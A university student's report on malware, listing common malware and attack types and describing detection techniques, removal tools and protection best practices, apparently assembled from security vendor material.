St.

Mary’s University
Computer application in management
Title: malware

Management-E

Name: Ekram mustefa ………………………RMD/2015/2014

Submitted to: Mr. Kiros Aynalem

Submitted date: May 13, 2023

Contents
What is malware? ................................................................................................................................... 4
How to protect against malware ...................................................................................................... 4
Types of malware .................................................................................................................................... 6
• Phishing ................................................................................................................................... 6
• Spyware................................................................................................................................... 6
• Adware .................................................................................................................................... 6
• Viruses ..................................................................................................................................... 7
• Exploits and exploit kits .......................................................................................................... 7
• Fileless malware ...................................................................................................................... 7
• Macro malware ....................................................................................................................... 7
• Ransomware ........................................................................................................................... 8
• Rootkits ................................................................................................................................... 9
• Supply chain attacks................................................................................................................ 9
• Tech support scams ................................................................................................................ 9
• Trojans..................................................................................................................................... 9
• Unwanted software .............................................................................................................. 10
• Worms ................................................................................................................................... 10
• Coin miners ........................................................................................................................... 10
Types of malware attacks ..................................................................................................................... 11
1) Adware ...................................................................................................................................... 11
2) Fileless Malware ....................................................................................................................... 12
3) Viruses....................................................................................................................................... 12
4) Worms....................................................................................................................................... 13
5) Trojans ...................................................................................................................................... 13
6) Bots ........................................................................................................................................... 13
7) Ransomware ............................................................................................................................. 14
8) Spyware .................................................................................................................................... 14
9) Mobile Malware........................................................................................................................ 15
10) Rootkits ................................................................................................................................... 15
How to detect and remove malware .................................................................................................... 15
Malware detection................................................................................................................................ 16
10 Malware Detection Techniques ................................................................................................ 17
1. Signature-based detection ........................................................................................................ 17
 2. Static file analysis ...................................................................................................................... 17
3. Dynamic malware analysis ........................................................................................................ 18
4. Dynamic monitoring of mass file operations ............................................................................ 18
5. File extensions blocklist/blocklisting......................................................................................... 18
6. Application allowlist/allowlisting .............................................................................................. 18
7. Malware honeypot/honeypot files ........................................................................................... 19
8. Checksumming/cyclic redundancy check (CRC) ........................................................................ 19
9. File entropy/measuring changes of a files’ data ....................................................................... 19
10. Machine learning behavioural analysis ................................................................................... 19
Malware removal .................................................................................................................................. 20
Malware protection .............................................................................................................................. 20
• Install an antivirus program .................................................................................................. 21
• Implement advanced email and endpoint protections ........................................................ 21
• Hold regular trainings ........................................................................................................... 21
• Take advantage of cloud backups ......................................................................................... 21
• Adopt a Zero Trust model ..................................................................................................... 22
• Join an information-sharing group........................................................................................ 22
• Maintain offline backups ...................................................................................................... 22
• Keep software up to date ..................................................................................................... 22
• Create an incident response plan ......................................................................................... 22
Types of advanced malware protection ........................................................................................... 23
Prevention ..................................................................................................................................... 23
Detection....................................................................................................................................... 23
Response ....................................................................................................................................... 24
Efficiency ....................................................................................................................................... 24
10 malware protection best practices ........................................................................................... 24
1. Update your frontline defenses ................................................................................................ 24
2. Back up data and test restore procedures ................................................................................ 25
3. Protect against malware ........................................................................................................... 25
4. Educate users on threat sources ............................................................................................... 25
5. Partition your network .............................................................................................................. 25
6. Leverage email security ............................................................................................................ 25
7. Use security analytics ................................................................................................................ 25
8. Create a set of instructions for IT staff ..................................................................................... 26
 9. Practice prevention and remediation ....................................................................................... 26
10. Deploy a zero-trust security framework ................................................................................. 26

What is malware?
Malware is a term used to describe any software that is specially
designed to disrupt damage or gain unauthorised access to
computer system. Malware is an umbrella term that describes any
malicious program or code that is harmful to systems. It seeks to
invade damage or disable computers, computer systems,
networks, tables, and mobile devices. Examples of common
malware include viruses, worms, Trojan viruses, spyware, adware
and ransomware. . Recent malware attacks have exfiltrated data
in mass amounts.

Malware, or “malicious software,” is an umbrella term that

describes any malicious program or code that is harmful to
systems.

Hostile, intrusive, and intentionally nasty, malware seeks to

invade, damage, or disable computers, computer systems,
networks, tablets, and mobile devices, often by taking partial
control over a device’s operations. Like the human flu, it
interferes with normal functioning.

The motives behind malware vary. Malware can be about making

money off you, sabotaging your ability to get work done, making a
political statement, or just bragging rights. Although malware
cannot damage the physical hardware of systems or network
equipment (with one known exception—see the Google Android
section below), it can steal, encrypt, or delete your data, alter or
hijack core computer functions, and spy on your computer
activity without your knowledge or permission.

How to protect against malware

In no particular order, here are our tips on protecting against
malware.

1. Pay attention to the domain and be wary if the site isn’t a top-
level domain, i.e., com, mil, net, org, edu, or biz, to name a few.

2. Use strong passwords with multi-factor authentication. A

password manager can be a big help here.

3. Avoid clicking on pop-up ads while browsing the Internet.

4. Avoid opening email attachments from unknown senders.

5. Do not click on strange, unverified links in emails, texts, and

social media messages.

6. Don’t download software from untrustworthy websites or

peer-to-peer file transfer networks.

7. Stick to official apps from Google Play and Apple’s App Store on
Android, OSX, and iOS (and don’t jailbreak your phone). PC users
should check the ratings and reviews before installing any
software.

8. Make sure your operating system, browsers, and plugins are

patched and up to date.

9. Delete any programs you don’t use anymore.

10. Back up your data regularly. If your files become damaged,

encrypted, or otherwise inaccessible, you’ll be covered.

11. Download and install a cyber-security program that actively

scans and blocks threats from getting on your device. Malware
bytes, for example, offers proactive cyber security programs
for Windows, Mac, Android, and Chrome book. Plus, our latest
offering, Malware bytes Browser Guard. It’s free and it’s the only
browser extension that can stop tech support scams along with
any other unsafe and unwanted content that comes at you
through your browser.

Types of malware
Malware comes in many forms—here are a few common types.
• Phishing
A phishing attack poses as a credible source to steal
sensitive information through emails, websites, text
messages, or other forms of electronic communication.
These attacks provide a delivery mechanism for malware.
Common attacks steal usernames, passwords, credit card
details, and banking information. These types of malware
attacks may lead to identity theft or money stolen directly
from someone’s personal bank account or credit card.

For example, a cybercriminal might pose as a well-known

bank and send an email alerting someone that their account
has been frozen because of suspicious activity, urging them
to click a link in the email to address the issue. Once they
clink the link, malware is installed.
• Spyware
Spyware works by installing itself on a device without
someone’s consent or providing adequate notice. Once
installed, it can monitor online behaviour, collect sensitive
information, change device settings, and decrease device
performance.
• Adware
Like Spyware, Adware installs itself to a device without
someone’s consent. But in the case of adware, the focus is on
displaying aggressive advertising, often in popup form, to
make money off clicks. These ads frequently slow a device’s
performance. More dangerous types of adware can also
install additional software, change browser settings, and
leave a device vulnerable for other malware attacks.
• Viruses
Viruses are designed to interfere with a device’s normal
operation by recording, corrupting, or deleting its data. They
often spread themselves to other devices by tricking people
into opening malicious files.
• Exploits and exploit kits
Exploits use vulnerabilities in software to bypass a
computer’s security safeguards to infect a device. Malicious
hackers scan for outdate systems that contain critical
vulnerabilities, and then exploit them by deploying malware.
By including shell code in an exploit, cybercriminals can
download more malware that infects devices and infiltrates
organizations.

Exploit kits contain a collection of exploits that scan for

different types of software vulnerabilities. If any are
detected, the kits deploy additional malware. Software that
can be infected includes Adobe Flash Player, Adobe Reader,
web browsers, Oracle Java, and Sun Java. Angler/Axpergle,
Neutrino, and Nuclear are a few types of common exploit
kits.

Exploits and exploit kits usually rely on malicious websites

or email attachments to breach a network or device, but
sometimes they also hide in ads on legitimate websites
without the website even knowing.
• Fileless malware
This type of cyber-attack broadly describes malware that
doesn’t rely on files—like an infected email attachment—to
breach a network. For example, they may arrive through
malicious network packets that exploit vulnerability and
then install malware that lives only in the kernel memory.
Fileless threats are especially difficult to find and remove
because most antivirus programs aren’t built to scan
firmware.
• Macro malware
 You may already be familiar with macros—ways to quickly
automate common tasks. Macro malware takes advantage of
this functionality by infecting email attachments and ZIP
files. To trick people into opening the files, cybercriminals
often hide the malware in files disguised as invoices,
receipts, and legal documents.

In the past, macro malware was more common because

macros ran automatically when a document was opened. But
in recent versions of Microsoft Office, macros are disabled by
default, meaning that cybercriminals who infect devices in
this way have to convince users to turn macros on.
• Ransomware
Ransomware is a type of malware that threatens a victim by
destroying or blocking access to critical data until a ransom
is paid. Human-operated ransomware attacks target an
organization through common system and security
misconfigurations that infiltrate the organization, navigate
its enterprise network, and adapt to the environment and
any weaknesses. A common method of gaining access to an
organization’s network to deliver ransomware is through
credential theft, in which a cybercriminal could steal an
actual employee’s credentials to pose as them and gain
access to their accounts.

Attackers using human-operated ransomware target large

organizations because they can pay a higher ransom than
the average individual—often many millions of dollars.
Because of the high stakes involved with a breach of this
scale, many organizations opt to pay the ransom rather than
have their sensitive data leaked or risk further attacks from
the cybercriminals, even though payment does not
guarantee the prevention of either outcome.

As human-operated ransomware attacks grow, the criminals

behind the attacks become more organized. In fact, many
ransomware operations now use a Ransomware as a Service
 model, meaning that a set of criminal developers create the
ransomware itself and then hire other cybercriminal
affiliates to hack an organization’s network and install the
ransomware, splitting the profits between the two groups at
an agreed-on rate.
• Rootkits
When a cybercriminal uses a rootkit, they hide malware on a
device for as long as possible, sometimes even years, so that
it steals information and resources on an ongoing basis. By
intercepting and changing standard operating system
processes, a rootkit may alter the information that your
device reports about itself. For example, a device infected
with a rootkit may not show an accurate list of programs
that are running. Rootkits may also give administrative or
elevated device privileges to cybercriminals, so they gain
complete control of a device and can perform potentially
malicious actions, such as steal data, spy on the victim, and
install additional malware.
• Supply chain attacks
This type of malware targets software developers and
providers by accessing source codes, building processes, or
updating mechanisms in legitimate apps. Once a
cybercriminal has found an unsecured network protocol,
unprotected server infrastructure, or unsafe coding practice,
they break in, change source codes, and hide malware in
build and update processes.
• Tech support scams
An industry-wide issue, tech support scams use scare tactics
to trick users into paying for unnecessary technical support
services that may be advertised to fix a falsified problem
relating to a device, a platform, or software. With this type of
malware, a cybercriminal may call someone directly and
pretend to be an employee of a software company. Once
they’ve gained someone’s trust, attackers often urge
potential victims to install applications or give remote access
to their devices.
• Trojans
 Trojans rely on a user unknowingly downloading them
because they appear to be legitimate files or apps. Once
downloaded, they may:

• Download and install additional malware, such as viruses

or worms.

• Use the infected device for click fraud.

• Record the keystrokes and websites that you visit.

• Send information (for example, passwords, login details,

and browsing history) about the infected device to a
malicious hacker.

• Give a cybercriminal control over the infected device.

• Unwanted software
When a device has unwanted software, the user may
experience a modified web browsing experience, altered
control of downloads and installations, misleading messages,
and unauthorized changes to device settings. Some
unwanted software is bundled with software that people
intend to download.
• Worms
Mostly found in email attachments, text messages, file-
sharing programs, social networking sites, network shares,
and removable drives, a worm spreads through a network
by exploiting security vulnerabilities and copying itself.
Depending on the type of worm, it might steal sensitive
information, change your security settings, or stop you from
accessing files.
• Coin miners
 With the rise in popularity of crypto currencies, mining coins
has become a lucrative practice. Coin miners use a device’s
computing resources to mine for crypto currencies.
Infections of this type of malware often begin with an email
attachment that attempts to install malware or a website
that uses vulnerabilities in web browsers or takes advantage
of computer processing power to add malware to devices.

Using complex mathematical calculations, coin miners

maintain the block chain ledger to steal computing resources
that allow the miner to create new coins. Coin mining takes
significant computer processing power, however, to steal
relatively small amounts of crypto currencies. For this
reason, cybercriminals often work in teams to maximize and
split profits.

Not all coin miners are criminal, though—individuals and

organizations sometimes purchase hardware and electronic
power for legitimate coin mining. The act becomes criminal
when a cybercriminal infiltrates a corporate network against
its knowledge to use its computing power for mining.

Types of malware attacks

1) Adware
Adware — commonly called “spam” — serves unwanted or
malicious advertising. While relatively harmless, it can be
irritating as adware can hamper your computer’s performance. In
addition, these ads may lead users to download more harmful
types of malware inadvertently. To defend against adware, make
sure you keep your operating system, web browser, and email
clients updated so they can block known adware attacks before
they are able to download and install.
2) Fileless Malware
Unlike traditional malware, which uses executable files to infect
devices, fileless malware doesn’t directly impact files or the file
system. Instead, this type of malware uses non-file objects like
Microsoft Office macros, PowerShell, WMI, and other system
tools. According to recent research, 40% of global malware
is fileless.
In addition, fileless malware increased by almost 900% year-
over-year in 2020. A notable example of a fileless malware attack
was Operation Cobalt Kitty, in which the Ocean Lotus Group
infiltrated several corporations and conducted nearly six months
of stealthy operations before being detected.
Because there’s no executable file, it is difficult for antivirus
software to protect against fileless malware. The best way to limit
what fileless malware can do is to limit users’ credentials. By
employing least privilege access, where users are only given the
rights and privileges needed to do a specific task, an organization
also limits the risk of fileless malware. Multi-factor
authentication (MFA), as well as employing a zero trust network
access (ZTNA), can also limit the attack surface for fileless
malware.
3) Viruses
A virus infects other programs and can spread to other systems,
in addition to performing its own malicious acts. A virus is
attached to a file and is executed once the file is launched. The
virus will then encrypts, corrupt, delete, or move your data and
files.
To defend against viruses, an enterprise-level antivirus solution
can help you protect all your devices from a single location while
maintaining central control and visibility. Make sure that you run
full scans frequently and keep your antivirus definitions up to
date.
4) Worms
Like a virus, a worm can duplicate itself in other devices or
systems. Unlike viruses, worms do not need human action to
spread once they are in a network or system. Worms often attack
a computer’s memory or hard drive. To protect yourself against
worms you should make sure every device is updated with the
latest patches. Technology like firewalls and email filtering will
also help you detect files or links that may contain a worm.
5) Trojans
A Trojan program pretends to be a legitimate one, but it is in fact
malicious. A Trojan can’t spread by itself like a virus or worm, but
instead must be executed by its victim, often through social
engineering tactics such as phishing. Trojans rely on social
engineering to spread, which puts the burden of defense on users.
Unfortunately, In 2022, 82% of breaches involved the human
element. Security awareness training is crucial for protecting
against Trojans, as employees are both the targets and the first
line of defense against these kinds of attacks.
6) Bots
A bot is a software program that performs an automated task
without requiring any interaction. Bots can execute attacks much
faster than humans ever could.
A computer with a bot infection can spread the bot to other
devices, creating what’s known as a botnet. This network of bot-
compromised machines can then be controlled and used to launch
massive attacks — such as DDoS attacks or brute force attacks —
often without the device owner being aware of its role in the
attack. Bots are also used for crypto mining on specific hardware.
One way to control bots is to use tools that help determine if
traffic is coming from a human user or a bot.
For example, you can add CAPTCHAs to your forms to prevent
bots from overwhelming your site with requests. This can help
you identify and separate good traffic from bad. Site traffic should
always be monitored, and organizations should make sure they’re
using updated browsers and user agents.
 7) Ransomware
Arguably the most common form of malware, ransomware
attacks encrypts a device’s data and holds it for ransom. If the
ransom isn’t paid by a certain deadline, the threat actor threatens
to delete or release the valuable data (often opting to sell it on the
dark web).
Ransomware attacks have increased by 13 percent year-over-
year, and are some of the most newsworthy malware types due to
their impact on hospitals, telecommunications firms, railway
networks, and governmental offices. Ransomware gangs, as well
as individual actors, are continuing to see the payoff in targeting
high-value organizations like supply chains and critical
infrastructure.
In the beginning of 2022, the Costa Rican government was
attacked by ransomware, affecting finance and other government
services to such a degree that a state of emergency was declared.
Employing an MDR solution can help an organization not only
monitor their networks but act fast in case of an attack. In
addition, security awareness training can help users detect and
prevent suspicious activity.

8) Spyware
Cybercriminals use spyware to monitor the activities of users. By
logging the keystrokes a user inputs throughout the day, the
malware can provide access to usernames, passwords, and
personal data. Spyware often leads to credential theft, which in
turn can lead to a devastating data breach. It often originates in
corrupt files, or through downloading suspicious files.
• Key loggers are a common kind of spyware that monitors and
records users’ keystrokes. With this kind of spyware, hackers can
steal credentials as well as credit card numbers and other data
that may be entered into a system through typing.
In addition to antivirus software, training employees and
employing multi-factor authentication can be used to prevent
spyware or the resulting credential theft.
9) Mobile Malware
As the name suggests, mobile malware is designed specifically to
target mobile devices. This kind of malware has become more
common not just with the proliferation of smart phones, but with
the increase of mobile and tablet use by organizations and
employees.
Mobile malware can employ several tactics, including spying and
recording texts and phone calls, impersonating common apps,
stealing credentials (for banking accounts or other applications),
or accessing data on the device. Mobile malware often spreads
through smashing (also known as SMS phishing).
This is where; once again, security awareness training can be
crucial — since many employees utilize their mobile devices for
work.
10) Rootkits
Rootkits were not originally designed as malware, but they have
become a common attack vector for hackers. A rootkit allows a
user to maintain privileged access within a system without being
detected.
In short, rootkits give a user administrative level access while
concealing that access. To prevent rootkits from doing damage,
organizations need to revoke privileged access and employ a zero
trust approach, where ever used must be verified. Organizations
should also employ multi-factor authentication to prevent single
credential access.

How to detect and remove malware

Malware isn’t always easily detectable, especially in the case of

fileless malware. It’s a good idea for organizations and individuals
alike to keep an eye out for an increase in popup ads, web
browser redirects, suspicious posts on social media accounts, and
messages about compromised accounts or device security.
Changes to a device’s performance, such as it running much more
slowly, may also be an indicator of concern.

If you’re worried that you’ve become a victim of a malware attack,

fortunately, you have options for detection and removal. As a first
step, take advantage of antivirus products, like the one offered
natively in Windows to scan for malware. Once you’ve installed an
antivirus program, run a device scan to look for any malicious
programs or code. If the program detects malware, it will list the
type and provide recommendations for removal. After removal,
be sure to keep the software updated and running to prevent
future attacks.

For more sophisticated attacks against organizations that

antivirus programs are unable to detect and block, Security
Information and Event Management (SIEM) and Extended
Detection and Response (XDR) tools provide security
professionals with cloud-powered endpoint security methods that
help detect and respond to attacks on endpoint devices. Because
these types of attacks are multifaceted, with cybercriminals
targeting more than just control of devices, SIEM and XDR help
enable organizations to see an attack’s bigger picture across all
domains—including devices, emails, and applications.

Getting started with SIEM & XDR tools, such as Microsoft

Sentinel, Microsoft 365 Defender, and Microsoft Defender for
Cloud, is a strong starting place for antivirus capabilities. Security
professionals should ensure that device settings are always
updated to match the latest recommendations to help prevent
malware threats.

Malware detection
Malware detection is a critical set of defensive techniques used to
identify, block and prevent the harmful effects of malware.
Malicious software exploits system vulnerabilities by exploiting
bugs in legitimate software. Malware detection techniques
include signature-based detection, dynamic and static analysis,
file extensions blocklisting and machine learning behavioural
analysis. Crowd Strike’s Falcon Prevent next-generation antivirus
is an innovative AI/ML-based technology that offers
comprehensive protection from malware and presents attacks in
an easy-to-understand process tree. Basic techniques of malware
detection include signature-based detection, check summing and
application allow listing, while advanced techniques use artificial
intelligence and machine learning. These advanced techniques
proactively look for unknown malware threats before they can do
damage to computer systems.

10 Malware Detection Techniques

An effective security practice uses a combination of expertise

and technology to detect and prevent malware. Tried and
proven techniques include:

1. Signature-based detection

Signature-based detection uses known digital indicators of

malware to identify suspicious behaviour. Lists of indicators of
compromise (IOCs), often maintained in a database, can be used
to identify a breach. While IOCs can be effective in identifying
malicious activity, they are reactive in nature. As a result,
Crowd Strike uses indicators of attack (IOA) to proactively
identify in-process cyber-attacks.

2. Static file analysis

Examining a file’s code, without running it, to identify signs of

malicious intent. File names, hashes, strings such as IP
addresses, and file header data can all be evaluated to
determine whether a file is malicious. While static file analysis
is a good starting point, proficient security teams use additional
techniques to detect advanced malware that can go
unidentified during static analysis.

3. Dynamic malware analysis

Dynamic malware analysis executes suspected malicious code

in a safe environment called a sandbox. This closed system
enables security professionals to watch and study the malware
in action without the risk of letting it infect their system or
escape into the enterprise network.

4. Dynamic monitoring of mass file operations

Observing mass file operations such as rename or delete

commands to identify signs of tampering or corruption.
Dynamic monitoring often uses a file integrity monitoring tool
to track and analyse the integrity of file systems through both
reactive forensic auditing and proactive rules-based
monitoring.

5. File extensions blocklist/blocklisting

File extensions are letters occurring after a period in a file

name, indicating the format of the file. This classification can be
used by criminals to package malware for delivery. As a result,
a common security method is to list known malicious file
extension types in a “blocklist” to prevent unsuspecting users
from downloading or using the dangerous file.

6. Application allowlist/allowlisting

The opposite of a blocklist/blocklisting, where an organization

authorizes a system to use applications on an approved list.
Allowlisting can be very effective in preventing nefarious
applications through rigid parameters. However, it can be
difficult to manage and reduce an organization’s operational
speed and flexibility.
7. Malware honeypot/honeypot files

A malware honeypot mimics a software application or an

application programming interface (API) to draw out malware
attacks in a controlled, non-threatening environment. Similarly,
a honeypot file is a decoy file to draw and detect attackers. In
doing so, security teams can analyse the attack techniques and
develop or enhance antimalware solutions to address these
specific vulnerabilities, threats or actors.

8. Checksumming/cyclic redundancy check (CRC)

A calculation on a collection of data, such as a file, to confirm its

integrity. One of the most common checksums used is a CRC,
which involves analysis of both value and position of a group of
data. Checksumming can be effective for identifying corruption
in data but is not foolproof for determining tampering.

9. File entropy/measuring changes of a files’ data

As threat intelligence and cyber security evolves, adversaries

increasingly create dynamic malware executable to avoid
detection. This results in modified files that have high entropy
levels. As a result, a file’s data change measured through
entropy can identify potential malware.

10. Machine learning behavioural analysis

Machine learning (ML) is a subset of artificial intelligence (AI),

and refers to the process of teaching algorithms to learn
patterns from existing data to predict answers on new data.
This technology can analyse file behaviour, identify patterns
and use these insights to improve detection of novel and
unidentified malware.
Malware removal
Malware removal is an essential process to keep personal devices
secure and running smoothly. There are several free and paid
software options available for malware removal. Malware bytes
offers free antivirus software that can remove threats like viruses,
ransomware, spyware, adware, and Trojans from personal
devices such as Windows and Mac computers, Android and
Chrome book devices, and iOS devices. Avast one is another free
virus removal tool that scans for and removes existing malware.
Windows Security is a built-in scanning tool in Windows 10 that
can find and remove malware from PCs. To use it, open Windows
Security settings and select Virus & threat protection, then select
Scan options and Windows Defender Offline scan.

Malware protection
Malware protection is a crucial aspect of cyber security that helps
safeguard your devices from various types of malicious software
like worms, Trojans, ransomware, and spyware/adware. Email-
borne threats are the most common form of cyber-attacks,
accounting for more than 90% of hacking attacks. Therefore, it is
important to ensure that your email security includes a strong
malware protection solution. The best malware protection
practices consist of installing robust cyber security solutions,
enabling two-factor authentication, keeping software up-to-date,
limiting access privileges, and administering security awareness
training. Mime cast offers a comprehensive cloud-based solution
for email threat protection and compliance, including malware
protection that blocks all malware attacks before they reach the
network, among other features. Anti-malware software scans
devices, detects, prevents, and removes malware threats using
signatures, heuristics, sandboxing, and removal.
Although anyone can become the victim of a malware attack,
there are many ways to prevent an attack from ever happening.
• Install an antivirus program
The best form of protection is prevention. Organizations can
block or detect many malware attacks with a trusted
security solution or antimalware service, such as Microsoft
Defender for Endpoint or Microsoft Defender Antivirus.
When you use a program like these, your device first scans
any files or links that you attempt to open to help ensure
they’re safe. If a file or website is malicious, the program will
alert you and suggest that you not open it. These programs
can also remove malware from a device that’s already
infected.
• Implement advanced email and endpoint protections
Help prevent malware attacks with Microsoft Defender for
Office 365, which scans links and attachments in emails and
collaboration tools, like SharePoint, OneDrive, and Microsoft
Teams. As part of Microsoft 365 Defender, Defender for
Office 365 offers detection and response capabilities to
eliminate the threat of malware attacks.

Also a part of Microsoft 365 Defender, Microsoft Defender

for Endpoint uses endpoint behavioural sensors, cloud
security analytics, and threat intelligence to help
organizations prevent, detect, investigate, and respond to
advanced threats.
• Hold regular trainings
Keep employees informed about how to spot the signs of
phishing and other cyber-attacks with regular trainings.
This will not only teach those safer practices for work but
also how to be safer when using their personal devices.
Simulation and training tools, like the attack simulation
training in Defender for Office 365, help simulate real-world
threats in your environment and assign training to end users
based on simulation results.
• Take advantage of cloud backups
 When you move your data to a cloud-based service, you’ll be
able to easily back up data for safer keeping. If your data is
ever compromised by malware, these services help ensure
that recovery is both immediate and comprehensive.
• Adopt a Zero Trust model
A Zero Trust model evaluates all devices and users for risk
before permitting them to access applications, files,
databases, and other devices, decreasing the likelihood that
a malicious identity or device could access resources and
install malware. As an example, implementing multifactor
authentication, one component of a Zero Trust model, has
been shown to reduce the effectiveness of identity attacks by
more than 99%. To evaluate your organization’s Zero Trust
maturity stage, take our Zero Trust Maturity Assessment.
• Join an information-sharing group
Information-sharing groups, frequently organized by
industry or geographic location, encourage similarly
structured organizations to work together toward cyber
security solutions. The groups also offer organizations
different benefits, such as incident response and digital
forensics services, news about the latest threats, and
monitoring of public IP ranges and domains.
• Maintain offline backups
Because some malware will try to seek out and delete any
online backups you may have, it’s a good idea to keep an
updated offline backup of sensitive data that you regularly
test to make sure it’s restorable if you’re ever hit by a
malware attack.
• Keep software up to date
In addition to keeping any antivirus solutions updated
(consider choosing automatic updates), be sure to download
and install any other system updates and software patches
as soon as they’re available. This helps minimize any
security vulnerabilities that a cybercriminal might exploit to
gain access to your network or devices.
• Create an incident response plan
 Just like having an emergency plan in place for how to exit
your home if there’s a fire keeps you safer and more
prepared, creating an incident response plan for what to do
if you’ve been hit with a malware attack will provide you
with actionable steps to take in different attack scenarios so
that you can get back to running normally and safely as soon
as possible.

Types of advanced malware protection

Prevention

Traditional antivirus (AV) software relies heavily upon detecting

the signature, or binary pattern, of a virus to identify and prevent
damage from malware. But most malware authors stay a step
ahead of such software by writing oligomorphic, polymorphic,
and more recently metamorphic viruses, which use obfuscation
techniques such as encrypting parts of themselves or otherwise
modify themselves so as to not match virus signatures in the
antivirus database.

Endpoint security that employs advanced malware protection

blocks known malware exploits accurately and efficiently without
being solely dependent on signatures. Conversely, legacy AV
solutions can be blind to malware in zip and other formats, as
well as fileless malware, and fail to catch advanced threats.

Detection

Around 2013, the security industry's focus began to shift toward

signature-less approaches to antivirus protection. Traditional
antivirus solutions may struggle to accurately detect low-
prevalence threats. But endpoint security that employs
continuous monitoring of all file activity results in faster detection
of new threats.
New antivirus capabilities were developed to detect and mitigate
zero-day attacks and other, more sophisticated malware. Some of
these next-generation capabilities include:

• Behaviour-based malware detection, which builds a full

context around every process execution path in real time
• Machine learning models, which identify patterns that match
known malware characteristics and other various forms of
artificial intelligence

Response

More effective response methods are now found in advanced

malware protection solutions, such as endpoint detection and
response (EDR) and—more recently—extended detection and
response (XDR) tools. Unlike traditional endpoint security,
advanced malware protection solutions also provide
retrospective security that rapidly contains the threat at the first
sign of malicious behavior.

Efficiency

Legacy antivirus deployments often require complex

configuration and management. Advanced malware protection
solutions provide prevention, detection, and response all in one
solution and are generally highly automated. Their built-in, open
platforms enable much simpler and more efficient workflows.

10 malware protection best practices

1. Update your frontline defenses
Adhere to policies and best practices for application, system, and
appliance security. Create unique passwords at least 16
characters in length and use a password manager. Patch systems
quickly as security flaws become well-known once the updates
are released.
2. Back up data and test restore procedures
Backup processes are critical to protecting against data loss. In a
world of fast-moving, network-based ransomware worms and
destructive cyber-attacks, you must enable a data protection
solution.
3. Protect against malware
Taking a layered approach with next-generation endpoint
monitoring tools, including AMP for Endpoints, next-generation
firewalls (NGFW), and an intrusion prevention system (IPS), will
help you deploy security from the endpoint to email to the DNS
layer.
4. Educate users on threat sources
Train users on whom and what to trust and teach them not to fall
for phishing or other schemes. Have them install two-factor
authentication as a first line of defense.
5. Partition your network
Reduce the risk of outbreak exposure by isolating your network
using network segmentation.
6. Leverage email security
Most ransomware infections are spread through an email
attachment or malicious download. Diligently block malicious
websites, emails, and attachments through a layered security
approach and a company-sanctioned file-sharing program.
7. Use security analytics
Closely monitor your network traffic by performing deeper and
more advanced analytics to see everything happening across your
network. Leverage real-time threat intelligence from
organizations such as Talos to better understand security
information and emerging cyber security threats.
8. Create a set of instructions for IT staff
Review and practice security response procedures by developing
an incident response plan.
9. Practice prevention and remediation
Learn about and consider additional security solutions that will
further protect your network as well as expand your company's
visibility. Conduct security scanning of microservice, cloud
service, and application administration systems.
10. Deploy a zero-trust security framework
This approach helps secure access from users, end-user devices,
APIs, IoT, micro services, containers, and more. It protects your
workforce, workloads, and workplace since you must first verify
their trustworthiness before granting access.